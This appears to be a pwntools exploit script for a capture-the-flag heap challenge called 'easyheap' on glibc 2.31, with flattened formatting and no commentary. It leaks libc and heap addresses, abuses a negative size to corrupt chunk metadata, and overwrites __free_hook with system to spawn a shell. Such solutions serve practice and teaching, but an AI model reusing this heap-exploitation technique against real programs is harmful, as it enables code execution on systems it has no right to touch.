1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
| from pwn import *
binary = "./easyheap" lib = "/usr/lib/x86_64-linux-gnu/libc-2.31.so" p = process(binary) elf = ELF(binary) libc = ELF(lib)
s = lambda buf: p.send(buf) sl = lambda buf: p.sendline(buf) sa = lambda delim, buf: p.sendafter(delim, buf) sal = lambda delim, buf: p.sendlineafter(delim, buf) sh = lambda: p.interactive() r = lambda n=None: p.recv(n) ra = lambda t=tube.forever:p.recvall(t) ru = lambda delim: p.recvuntil(delim) rl = lambda: p.recvline() rls = lambda n=2**20: p.recvlines(n)
def add(malloc_size,content,editable_size=None): sal(">> ","1") if(editable_size): sal("Size: ",str(editable_size)) sal("Size: ",str(malloc_size)) sal("Content: ",content) def show(id): sal(">> ","2") sal("Index: ",str(id))
def free(id): sal(">> ","3") sal("Index: ",str(id))
def leakheap(): add(0x1,"",0xfff) add(0x1,"",0xfff) free(0) free(1) add(0x1,"A",0xfff) show(0)
def leaklibc(): for _ in range(8): add(0x80,"A",0xfff) for _ in range(7): free(7-_) free(0) add(0x1,"A",0xfff) show(0)
leaklibc() malloc_hook = u64(ru("\x7f")[-6:]+"\x00\x00")-193-0x10 libc.address = malloc_hook - libc.sym["__malloc_hook"] info("libc base => 0x%x"%libc.address) free(0)
leakheap() ru("Content: ") heap = u64(r(6)+"\x00\x00") - 0x241 info("heap base => 0x%x"%heap)
payload = "" payload += "A"*0x10 payload += p64(0) payload += p64(0x90) payload += p64(libc.sym["__free_hook"]-0x8) payload += p64(heap+0x10) add(0x48,payload,-0x217)
payload = "" payload += "/bin/sh\x00" payload += p64(libc.sym["system"]) add(0x80,"",0xfff) add(0x80,payload,0xfff)
free(3)
sh()
|